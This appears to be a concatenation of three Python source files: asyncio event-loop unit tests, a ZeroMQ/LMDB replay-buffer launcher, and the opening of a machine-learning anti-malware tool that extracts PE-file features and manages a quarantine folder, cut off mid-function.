wd = weakref.WeakValueDictionary()
h = asyncio.Handle(lambda: None, (), self.loop)
wd['h'] = h # Would fail without __weakref__ slot.
def test_handle_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s>'
% (filename, lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<Handle cancelled>')
# decorated function
cb = asyncio.coroutine(noop)
h = asyncio.Handle(cb, (), self.loop)
self.assertEqual(repr(h),
'<Handle noop() at %s:%s>'
% (filename, lineno))
# partial function
cb = functools.partial(noop, 1, 2)
h = asyncio.Handle(cb, (3,), self.loop)
regex = (r'^<Handle noop\(1, 2\)\(3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial function with keyword args
cb = functools.partial(noop, x=1)
h = asyncio.Handle(cb, (2, 3), self.loop)
regex = (r'^<Handle noop\(x=1\)\(2, 3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial method
if sys.version_info >= (3, 4):
method = HandleTests.test_handle_repr
cb = functools.partialmethod(method)
filename, lineno = test_utils.get_function_source(method)
h = asyncio.Handle(cb, (), self.loop)
cb_regex = r'<function HandleTests.test_handle_repr .*>'
cb_regex = (r'functools.partialmethod\(%s, , \)\(\)' % cb_regex)
regex = (r'^<Handle %s at %s:%s>$'
% (cb_regex, re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
def test_handle_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# double cancellation won't overwrite _repr
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_handle_source_traceback(self):
loop = asyncio.get_event_loop_policy().new_event_loop()
loop.set_debug(True)
self.set_event_loop(loop)
def check_source_traceback(h):
lineno = sys._getframe(1).f_lineno - 1
self.assertIsInstance(h._source_traceback, list)
self.assertEqual(h._source_traceback[-1][:3],
(__file__,
lineno,
'test_handle_source_traceback'))
# call_soon
h = loop.call_soon(noop)
check_source_traceback(h)
# call_soon_threadsafe
h = loop.call_soon_threadsafe(noop)
check_source_traceback(h)
# call_later
h = loop.call_later(0, noop)
check_source_traceback(h)
# call_at
h = loop.call_later(0, noop)
check_source_traceback(h)
@unittest.skipUnless(hasattr(collections.abc, 'Coroutine'),
'No collections.abc.Coroutine')
def test_coroutine_like_object_debug_formatting(self):
# Test that asyncio can format coroutines that are instances of
# collections.abc.Coroutine, but lack cr_core or gi_code attributes
# (such as ones compiled with Cython).
coro = CoroLike()
coro.__name__ = 'AAA'
self.assertTrue(asyncio.iscoroutine(coro))
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
coro.__qualname__ = 'BBB'
self.assertEqual(coroutines._format_coroutine(coro), 'BBB()')
coro.cr_running = True
self.assertEqual(coroutines._format_coroutine(coro), 'BBB() running')
coro = CoroLike()
# Some coroutines might not have '__name__', such as
# built-in async_gen.asend().
self.assertEqual(coroutines._format_coroutine(coro), 'CoroLike()')
class TimerTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
def test_hash(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(hash(h), hash(when))
def test_timer(self):
def callback(*args):
return args
args = (1, 2, 3)
when = time.monotonic()
h = asyncio.TimerHandle(when, callback, args, mock.Mock())
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
# cancel
h.cancel()
self.assertTrue(h.cancelled())
self.assertIsNone(h._callback)
self.assertIsNone(h._args)
# when cannot be None
self.assertRaises(AssertionError,
asyncio.TimerHandle, None, callback, args,
self.loop)
def test_timer_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.TimerHandle(123, noop, (), self.loop)
src = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() at %s:%s>' % src)
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123>')
def test_timer_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.TimerHandle(123, noop, (), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_timer_comparison(self):
def callback(*args):
return args
when = time.monotonic()
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when, callback, (), self.loop)
# TODO: Use assertLess etc.
self.assertFalse(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertTrue(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertFalse(h2 > h1)
self.assertTrue(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertTrue(h1 == h2)
self.assertFalse(h1 != h2)
h2.cancel()
self.assertFalse(h1 == h2)
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
self.assertTrue(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertFalse(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertTrue(h2 > h1)
self.assertFalse(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertFalse(h1 == h2)
self.assertTrue(h1 != h2)
h3 = asyncio.Handle(callback, (), self.loop)
self.assertIs(NotImplemented, h1.__eq__(h3))
self.assertIs(NotImplemented, h1.__ne__(h3))
class AbstractEventLoopTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
self.assertRaises(
NotImplementedError, loop.run_forever)
self.assertRaises(
NotImplementedError, loop.run_until_complete, None)
self.assertRaises(
NotImplementedError, loop.stop)
self.assertRaises(
NotImplementedError, loop.is_running)
self.assertRaises(
NotImplementedError, loop.is_closed)
self.assertRaises(
NotImplementedError, loop.close)
self.assertRaises(
NotImplementedError, loop.create_task, None)
self.assertRaises(
NotImplementedError, loop.call_later, None, None)
self.assertRaises(
NotImplementedError, loop.call_at, f, f)
self.assertRaises(
NotImplementedError, loop.call_soon, None)
self.assertRaises(
NotImplementedError, loop.time)
self.assertRaises(
NotImplementedError, loop.call_soon_threadsafe, None)
self.assertRaises(
NotImplementedError, loop.set_default_executor, f)
self.assertRaises(
NotImplementedError, loop.add_reader, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_reader, 1)
self.assertRaises(
NotImplementedError, loop.add_writer, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_writer, 1)
self.assertRaises(
NotImplementedError, loop.add_signal_handler, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.set_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.default_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.call_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.get_debug)
self.assertRaises(
NotImplementedError, loop.set_debug, f)
def test_not_implemented_async(self):
async def inner():
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
with self.assertRaises(NotImplementedError):
await loop.run_in_executor(f, f)
with self.assertRaises(NotImplementedError):
await loop.getaddrinfo('localhost', 8080)
with self.assertRaises(NotImplementedError):
await loop.getnameinfo(('localhost', 8080))
with self.assertRaises(NotImplementedError):
await loop.create_connection(f)
with self.assertRaises(NotImplementedError):
await loop.create_server(f)
with self.assertRaises(NotImplementedError):
await loop.create_datagram_endpoint(f)
with self.assertRaises(NotImplementedError):
await loop.sock_recv(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_recv_into(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_sendall(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_connect(f, f)
with self.assertRaises(NotImplementedError):
await loop.sock_accept(f)
with self.assertRaises(NotImplementedError):
await loop.connect_read_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.connect_write_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.subprocess_shell(f, mock.sentinel)
with self.assertRaises(NotImplementedError):
await loop.subprocess_exec(f)
loop = asyncio.new_event_loop()
loop.run_until_complete(inner())
loop.close()
class ProtocolsAbsTests(unittest.TestCase):
def test_empty(self):
f = mock.Mock()
p = asyncio.Protocol()
self.assertIsNone(p.connection_made(f))
self.assertIsNone(p.connection_lost(f))
self.assertIsNone(p.data_received(f))
self.assertIsNone(p.eof_received())
dp = asyncio.DatagramProtocol()
self.assertIsNone(dp.connection_made(f))
self.assertIsNone(dp.connection_lost(f))
self.assertIsNone(dp.error_received(f))
self.assertIsNone(dp.datagram_received(f, f))
sp = asyncio.SubprocessProtocol()
self.assertIsNone(sp.connection_made(f))
self.assertIsNone(sp.connection_lost(f))
self.assertIsNone(sp.pipe_data_received(1, f))
self.assertIsNone(sp.pipe_connection_lost(1, f))
self.assertIsNone(sp.process_exited())
class PolicyTests(unittest.TestCase):
def test_event_loop_policy(self):
policy = asyncio.AbstractEventLoopPolicy()
self.assertRaises(NotImplementedError, policy.get_event_loop)
self.assertRaises(NotImplementedError, policy.set_event_loop, object())
self.assertRaises(NotImplementedError, policy.new_event_loop)
self.assertRaises(NotImplementedError, policy.get_child_watcher)
self.assertRaises(NotImplementedError, policy.set_child_watcher,
object())
def test_get_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
self.assertIsNone(policy._local._loop)
loop = policy.get_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
self.assertIs(policy._local._loop, loop)
self.assertIs(loop, policy.get_event_loop())
loop.close()
def test_get_event_loop_calls_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
with mock.patch.object(
policy, "set_event_loop",
wraps=policy.set_event_loop) as m_set_event_loop:
loop = policy.get_event_loop()
# policy._local._loop must be set through .set_event_loop()
# (the unix DefaultEventLoopPolicy needs this call to attach
# the child watcher correctly)
m_set_event_loop.assert_called_with(loop)
loop.close()
def test_get_event_loop_after_set_none(self):
policy = asyncio.DefaultEventLoopPolicy()
policy.set_event_loop(None)
self.assertRaises(RuntimeError, policy.get_event_loop)
@mock.patch('asyncio.events.threading.current_thread')
def test_get_event_loop_thread(self, m_current_thread):
def f():
policy = asyncio.DefaultEventLoopPolicy()
self.assertRaises(RuntimeError, policy.get_event_loop)
th = threading.Thread(target=f)
th.start()
th.join()
def test_new_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
loop = policy.new_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
loop.close()
def test_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
old_loop = policy.get_event_loop()
self.assertRaises(AssertionError, policy.set_event_loop, object())
loop = policy.new_event_loop()
policy.set_event_loop(loop)
self.assertIs(loop, policy.get_event_loop())
self.assertIsNot(old_loop, policy.get_event_loop())
loop.close()
old_loop.close()
def test_get_event_loop_policy(self):
policy = asyncio.get_event_loop_policy()
self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
self.assertIs(policy, asyncio.get_event_loop_policy())
def test_set_event_loop_policy(self):
self.assertRaises(
AssertionError, asyncio.set_event_loop_policy, object())
old_policy = asyncio.get_event_loop_policy()
policy = asyncio.DefaultEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
self.assertIs(policy, asyncio.get_event_loop_policy())
self.assertIsNot(policy, old_policy)
class GetEventLoopTestsMixin:
_get_running_loop_impl = None
_set_running_loop_impl = None
get_running_loop_impl = None
get_event_loop_impl = None
def setUp(self):
self._get_running_loop_saved = events._get_running_loop
self._set_running_loop_saved = events._set_running_loop
self.get_running_loop_saved = events.get_running_loop
self.get_event_loop_saved = events.get_event_loop
events._get_running_loop = type(self)._get_running_loop_impl
events._set_running_loop = type(self)._set_running_loop_impl
events.get_running_loop = type(self).get_running_loop_impl
events.get_event_loop = type(self).get_event_loop_impl
asyncio._get_running_loop = type(self)._get_running_loop_impl
asyncio._set_running_loop = type(self)._set_running_loop_impl
asyncio.get_running_loop = type(self).get_running_loop_impl
asyncio.get_event_loop = type(self).get_event_loop_impl
super().setUp()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
if sys.platform != 'win32':
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
try:
if sys.platform != 'win32':
asyncio.set_child_watcher(None)
super().tearDown()
finally:
self.loop.close()
asyncio.set_event_loop(None)
events._get_running_loop = self._get_running_loop_saved
events._set_running_loop = self._set_running_loop_saved
events.get_running_loop = self.get_running_loop_saved
events.get_event_loop = self.get_event_loop_saved
asyncio._get_running_loop = self._get_running_loop_saved
asyncio._set_running_loop = self._set_running_loop_saved
asyncio.get_running_loop = self.get_running_loop_saved
asyncio.get_event_loop = self.get_event_loop_saved
if sys.platform != 'win32':
def test_get_event_loop_new_process(self):
# Issue bpo-32126: The multiprocessing module used by
# ProcessPoolExecutor is not functional when the
# multiprocessing.synchronize module cannot be imported.
support.import_module('multiprocessing.synchronize')
async def main():
pool = concurrent.futures.ProcessPoolExecutor()
result = await self.loop.run_in_executor(
pool, _test_get_event_loop_new_process__sub_proc)
pool.shutdown()
return result
self.assertEqual(
self.loop.run_until_complete(main()),
'hello')
def test_get_event_loop_returns_running_loop(self):
class TestError(Exception):
pass
class Policy(asyncio.DefaultEventLoopPolicy):
def get_event_loop(self):
raise TestError
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(Policy())
loop = asyncio.new_event_loop()
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
async def func():
self.assertIs(asyncio.get_event_loop(), loop)
self.assertIs(asyncio.get_running_loop(), loop)
self.assertIs(asyncio._get_running_loop(), loop)
loop.run_until_complete(func())
asyncio.set_event_loop(loop)
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
finally:
asyncio.set_event_loop_policy(old_policy)
if loop is not None:
loop.close()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
class TestPyGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._py__get_running_loop
_set_running_loop_impl = events._py__set_running_loop
get_running_loop_impl = events._py_get_running_loop
get_event_loop_impl = events._py_get_event_loop
try:
import _asyncio # NoQA
except ImportError:
pass
else:
class TestCGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._c__get_running_loop
_set_running_loop_impl = events._c__set_running_loop
get_running_loop_impl = events._c_get_running_loop
get_event_loop_impl = events._c_get_event_loop
class TestServer(unittest.TestCase):
def test_get_loop(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
proto = MyProto(loop)
server = loop.run_until_complete(loop.create_server(lambda: proto, '0.0.0.0', 0))
self.assertEqual(server.get_loop(), loop)
server.close()
loop.run_until_complete(server.wait_closed())
class TestAbstractServer(unittest.TestCase):
def test_close(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().close()
def test_wait_closed(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
with self.assertRaises(NotImplementedError):
loop.run_until_complete(events.AbstractServer().wait_closed())
def test_get_loop(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().get_loop()
if __name__ == '__main__':
unittest.main()
|
main_loop.py | import copy
import multiprocessing as mp
import os
import shutil
import signal
import sys
import tempfile
import threading
import urllib.parse
import zmq
from loguru import logger
from .sampler_loop import sampler_loop
from ..cache_policy import FIFOPolicy
from ..sampler import PERSampler
from ..utils import ZMQ_DEFAULT_HWM, get_ipc_addr, get_local_ip, get_tcp_addr, init_lmdb
from ..utils.pack import deserialize, serialize
def append_loop(in_addr, sampler_addr, lmdb_path, cache_policy, capacity):
ctx = zmq.Context.instance(4)
ctx.setsockopt(zmq.LINGER, 0)
in_sock = ctx.socket(zmq.PULL)
in_sock.set_hwm(ZMQ_DEFAULT_HWM)
in_sock.bind(in_addr)
sampler_sock = ctx.socket(zmq.PUSH)
sampler_sock.set_hwm(ZMQ_DEFAULT_HWM)
sampler_sock.connect(sampler_addr)
lmdb_env = None
step_counter = 0
busy_counter = 0
try:
while True:
step_counter += 1
if in_sock.poll(timeout=0, flags=zmq.POLLIN):
busy_counter += 1
if step_counter >= 100 and busy_counter / step_counter > 0.7:
logger.warning(f"append loop ({busy_counter}/{step_counter})")
busy_counter = 0
step_counter = 0
req_frame = in_sock.recv(copy=False)
data, weights = deserialize(req_frame.buffer)
indices = cache_policy.get_indices(len(weights))
if lmdb_env is None:
map_size = 1.5 * capacity * memoryview(data[0]).nbytes
lmdb_env = init_lmdb(lmdb_path, map_size)
logger.info(
f"lmdb created, map size: {map_size / 1024 / 1024 / 1024:.2f} GB"
)
with lmdb_env.begin(write=True) as txn:
for i, idx in enumerate(indices):
txn.put(str(idx).encode(), data[i])
sampler_sock.send(serialize([indices, weights, False]))
except KeyboardInterrupt:
# silent exit
pass
def meta_loop(meta_addr, config):
config = copy.deepcopy(config)
# process config
for info in config["sampler_info"].values():
info["sampler_cls"] = info["sampler_cls"].__name__
ctx = zmq.Context.instance()
ctx.setsockopt(zmq.LINGER, 0)
sock = ctx.socket(zmq.REP)
sock.set_hwm(ZMQ_DEFAULT_HWM)
sock.bind(meta_addr)
while True:
sock.recv()
sock.send_json(config)
def update_proxy_loop(in_addr, out_addr):
ctx = zmq.Context.instance()
ctx.setsockopt(zmq.LINGER, 0)
in_sock = ctx.socket(zmq.PULL)
in_sock.set_hwm(ZMQ_DEFAULT_HWM)
in_sock.bind(in_addr)
out_sock = ctx.socket(zmq.PUB)
out_sock.bind(out_addr)
zmq.proxy(in_sock, out_sock)
class SignalHandler:
def __init__(self, proc_list, temp_folder):
self.proc_list = proc_list
self.temp_folder = temp_folder
self.exit_flag = False
def on_signal(self, signum, *_):
if self.exit_flag:
return
self.exit_flag = True
logger.info(f"signal {signum} recieved, terminating...")
for proc in self.proc_list:
proc.terminate()
proc.join()
shutil.rmtree(self.temp_folder)
logger.info("replay buffer terminated")
sys.exit(signum)
def main_loop(capacity, batch_size, meta_addr=None, samplers=None, cache_policy=None):
mp_ctx = mp.get_context("spawn")
# default args
if cache_policy is None:
cache_policy = FIFOPolicy(capacity)
if samplers is None:
samplers = [
{
"sampler_cls": PERSampler,
"num_procs": 1,
"sample_start": 1000,
}
]
if meta_addr is None:
host = get_local_ip()
else:
host = urllib.parse.urlparse(meta_addr).hostname
if os.name == "nt":
temp_dir = None
else:
temp_dir = "/dev/shm"
temp_folder = tempfile.mkdtemp(prefix="reth_buffer", dir=temp_dir)
# normalize sampler param
sampler_info = {}
for item in samplers:
topic = item.get("topic", "default")
assert topic not in sampler_info
num_procs = item.get("num_procs", 1)
kwargs = item.get("kwargs", {})
kwargs["capacity"] = capacity
sample_start = item.get("sample_start", 1000)
sample_start = max(sample_start, batch_size)
info = {
"topic": topic,
"sampler_cls": item["sampler_cls"],
"num_procs": num_procs,
"kwargs": kwargs,
"addrs": [
get_ipc_addr(temp_folder, f"sampler-{topic}-{idx}")
for idx in range(num_procs)
],
"sample_start": sample_start,
"batch_size": batch_size,
}
sampler_info[topic] = info
# generate addrs
if meta_addr is None:
meta_addr = get_tcp_addr(host)
append_addr = get_tcp_addr(host)
update_addr = get_ipc_addr(temp_folder, "update")
_update_proxy_out_addr = get_ipc_addr(temp_folder, "update-proxy-out")
lmdb_path = os.path.join(temp_folder, "lmdb")
os.makedirs(lmdb_path, exist_ok=True)
config = {
"capacity": capacity,
"batch_size": batch_size,
"lmdb_path": lmdb_path,
"meta_addr": meta_addr,
"append_addr": append_addr,
"update_addr": update_addr,
"sampler_info": sampler_info,
}
# start processes
created_procs = []
signal_handler = SignalHandler(created_procs, temp_folder)
signal.signal(signal.SIGINT, signal_handler.on_signal)
signal.signal(signal.SIGTERM, signal_handler.on_signal)
# main proc threads
meta_thread = threading.Thread(
target=meta_loop, args=(meta_addr, config), daemon=True
)
meta_thread.start()
update_proxy_thread = threading.Thread(
target=update_proxy_loop,
args=(update_addr, _update_proxy_out_addr),
daemon=True,
)
update_proxy_thread.start()
# append
append_proc = mp_ctx.Process(
target=append_loop,
args=(append_addr, update_addr, lmdb_path, cache_policy, capacity),
)
append_proc.start()
created_procs.append(append_proc)
# sampler
for topic, info in sampler_info.items():
for idx in range(info["num_procs"]):
sampler_proc = mp_ctx.Process(
target=sampler_loop,
args=(_update_proxy_out_addr, info, idx),
)
sampler_proc.start()
created_procs.append(sampler_proc)
meta_thread.join()
update_proxy_thread.join()
|
MLAntiMalware.py | import pefile
import os
import array
import math
import pickle
import joblib
import sys
from threading import *
from tkinter import *
from tkinter.filedialog import askopenfilename
import tkinter, tkinter.scrolledtext
import sys
import urllib.request
import glob
import time
import hashlib
import quarantaene
os_name = sys.platform
terminations = []
if "win" in os_name:
if not os.path.exists("MLAnti\\Quarantine\\"):
os.makedirs("MLAnti\\Quarantine\\")
quarantine_folder = "MLAnti\\Quarantine\\*"
file_to_quarantine = "MLAnti\\Quarantine\\"
transfer = os. getcwd() + "\\Transfer\\*"
classifier = os.getcwd() + "\\Classifier"
else:
if not os.path.exists("MLAnti/Quarantine/"):
os.makedirs("MLAnti/Quarantine/")
quarantine_folder = "MLAnti/Quarantine/*"
file_to_quarantine = "MLAnti/Quarantine/"
transfer = os. getcwd() + "/Transfer/*"
classifier = os.getcwd() + "/Classifier"
main = None
update_button = None
scan_button = None
quit_button = None
b_delete = None
b_delete_all = None
b_restore = None
b_restore_all = None
b_add_file = None
text_box = None
li = None
file= None
def get_entropy(data):
"""Get entropy of file"""
if len(data) == 0:
return 0.0
occurences = array.array('L', [0] * 256)
for x in data:
occurences[x if isinstance(x, int) else ord(x)] += 1
entropy = 0
for x in occurences:
if x:
p_x = float(x) / len(data)
entropy -= p_x * math.log(p_x, 2)
return entropy
def get_resources(pe):
"""Extract resources: [entropy, size]"""
resources = []
if hasattr(pe, 'DIRECTORY_ENTRY_RESOURCE'):
try:
for resource_type in pe.DIRECTORY_ENTRY_RESOURCE.entries:
if hasattr(resource_type, 'directory'):
for resource_id in resource_type.directory.entries:
if hasattr(resource_id, 'directory'):
for resource_lang in resource_id.directory.entries:
data = pe.get_data(
resource_lang.data.struct.OffsetToData, resource_lang.data.struct.Size)
size = resource_lang.data.struct.Size
entropy = get_entropy(data)
resources.append([entropy, size])
except Exception:
return resources
return resources
def get_version_info(pe):
"""Return version information"""
res = {}
for fileinfo in pe.FileInfo:
if fileinfo.Key == 'StringFileInfo':
for st in fileinfo.StringTable:
for entry in st.entries.items():
res[entry[0]] = entry[1]
if fileinfo.Key == 'VarFileInfo':
for var in fileinfo.Var:
res[var.entry.items()[0][0]] = var.entry.items()[0][1]
if hasattr(pe, 'VS_FIXEDFILEINFO'):
res['flags'] = pe.VS_FIXEDFILEINFO.FileFlags
res['os'] = pe.VS_FIXEDFILEINFO.FileOS
res['type'] = pe.VS_FIXEDFILEINFO.FileType
res['file_version'] = pe.VS_FIXEDFILEINFO.FileVersionLS
res['product_version'] = pe.VS_FIXEDFILEINFO.ProductVersionLS
res['signature'] = pe.VS_FIXEDFILEINFO.Signature
res['struct_version'] = pe.VS_FIXEDFILEINFO.StrucVersion
return res
def extract_infos(fpath):
"""Extract information about file"""
try:
pe = pefile.PE(fpath)
except pefile.PEFormatError:
return {}
res = {}
res['Machine'] = pe.FILE_HEADER.Machine
res['SizeOfOptionalHeader'] = pe.FILE_HEADER.SizeOfOptionalHeader
res['Characteristics'] = pe.FILE_HEADER.Characteristics
res['MajorLinkerVersion'] = pe.OPTIONAL_HEADER.MajorLinkerVersion
res['MinorLinkerVersion'] = pe.OPTIONAL_HEADER.MinorLinkerVersion
res['SizeOfCode'] = pe.OPTIONAL_HEADER.SizeOfCode
res['SizeOfInitializedData'] = pe.OPTIONAL_HEADER.SizeOfInitializedData
res['SizeOfUninitializedData'] = pe.OPTIONAL_HEADER.SizeOfUninitializedData
res['AddressOfEntryPoint'] = pe.OPTIONAL_HEADER.AddressOfEntryPoint
res['BaseOfCode'] = pe.OPTIONAL_HEADER.BaseOfCode
try:
res['BaseOfData'] = pe.OPTIONAL_HEADER.BaseOfData
except AttributeError:
res['BaseOfData'] = 0
res['ImageBase'] = pe.OPTIONAL_HEADER.ImageBase
res['SectionAlignment'] = pe.OPTIONAL_HEADER.SectionAlignment
res['FileAlignment'] = pe.OPTIONAL_HEADER.FileAlignment
res['MajorOperatingSystemVersion'] = pe.OPTIONAL_HEADER.MajorOperatingSystemVersion
res['MinorOperatingSystemVersion'] = pe.OPTIONAL_HEADER.MinorOperatingSystemVersion
res['MajorImageVersion'] = pe.OPTIONAL_HEADER.MajorImageVersion
res['MinorImageVersion'] = pe.OPTIONAL_HEADER.MinorImageVersion
res['MajorSubsystemVersion'] = pe.OPTIONAL_HEADER.MajorSubsystemVersion
res['MinorSubsystemVersion'] = pe.OPTIONAL_HEADER.MinorSubsystemVersion
res['SizeOfImage'] = pe.OPTIONAL_HEADER.SizeOfImage
res['SizeOfHeaders'] = pe.OPTIONAL_HEADER.SizeOfHeaders
res['CheckSum'] = pe.OPTIONAL_HEADER.CheckSum
res['Subsystem'] = pe.OPTIONAL_HEADER.Subsystem
res['DllCharacteristics'] = pe.OPTIONAL_HEADER.DllCharacteristics
res['SizeOfStackReserve'] = pe.OPTIONAL_HEADER.SizeOfStackReserve
res['SizeOfStackCommit'] = pe.OPTIONAL_HEADER.SizeOfStackCommit
res['SizeOfHeapReserve'] = pe.OPTIONAL_HEADER.SizeOfHeapReserve
res['SizeOfHeapCommit'] = pe.OPTIONAL_HEADER.SizeOfHeapCommit
res['LoaderFlags'] = pe.OPTIONAL_HEADER.LoaderFlags
res['NumberOfRvaAndSizes'] = pe.OPTIONAL_HEADER.NumberOfRvaAndSizes
# Sections
res['SectionsNb'] = len(pe.sections)
entropy = list(map(lambda x: x.get_entropy(), pe.sections))
res['SectionsMeanEntropy'] = sum(entropy) / float(len(entropy))
res['SectionsMinEntropy'] = min(entropy)
res['SectionsMaxEntropy'] = max(entropy)
raw_sizes = list(map(lambda x: x.SizeOfRawData, pe.sections))
res['SectionsMeanRawsize'] = sum(raw_sizes) / float(len(raw_sizes))
res['SectionsMinRawsize'] = min(raw_sizes)
res['SectionsMaxRawsize'] = max(raw_sizes)
virtual_sizes = list(map(lambda x: x.Misc_VirtualSize, pe.sections))
res['SectionsMeanVirtualsize'] = sum(
virtual_sizes) / float(len(virtual_sizes))
res['SectionsMinVirtualsize'] = min(virtual_sizes)
res['SectionMaxVirtualsize'] = max(virtual_sizes)
# Imports
try:
res['ImportsNbDLL'] = len(pe.DIRECTORY_ENTRY_IMPORT)
imports = sum([x.imports for x in pe.DIRECTORY_ENTRY_IMPORT], [])
res['ImportsNb'] = len(imports)
res['ImportsNbOrdinal'] = len(
list(filter(lambda x: x.name is None, imports)))
except AttributeError:
res['ImportsNbDLL'] = 0
res['ImportsNb'] = 0
res['ImportsNbOrdinal'] = 0
# Exports
try:
res['ExportNb'] = len(pe.DIRECTORY_ENTRY_EXPORT.symbols)
except AttributeError:
# No export
res['ExportNb'] = 0
# Resources
resources = get_resources(pe)
res['ResourcesNb'] = len(resources)
if len(resources) > 0:
entropy = list(map(lambda x: x[0], resources))
res['ResourcesMeanEntropy'] = sum(entropy) / float(len(entropy))
res['ResourcesMinEntropy'] = min(entropy)
res['ResourcesMaxEntropy'] = max(entropy)
sizes = list(map(lambda x: x[1], resources))
res['ResourcesMeanSize'] = sum(sizes) / float(len(sizes))
res['ResourcesMinSize'] = min(sizes)
res['ResourcesMaxSize'] = max(sizes)
else:
res['ResourcesNb'] = 0
res['ResourcesMeanEntropy'] = 0
res['ResourcesMinEntropy'] = 0
res['ResourcesMaxEntropy'] = 0
res['ResourcesMeanSize'] = 0
res['ResourcesMinSize'] = 0
res['ResourcesMaxSize'] = 0
# Load configuration size
try:
res['LoadConfigurationSize'] = pe.DIRECTORY_ENTRY_LOAD_CONFIG.struct.Size
except AttributeError:
res['LoadConfigurationSize'] = 0
# Version configuration size
try:
version_infos = get_version_info(pe)
res['VersionInformationSize'] = len(version_infos.keys())
except AttributeError:
res['VersionInformationSize'] = 0
return res
def quarantine():
global text_box
global terminations
global li
global b_delete
global b_delete_all
global b_restore
global b_restore_all
global b_add_file
k = 0
while True:
tmp = len(li.get(k))
if tmp == 0:
break
else:
li.delete(0, tmp)
k += 1
li.update()
terminations = glob.glob(quarantine_folder)
if terminations == []:
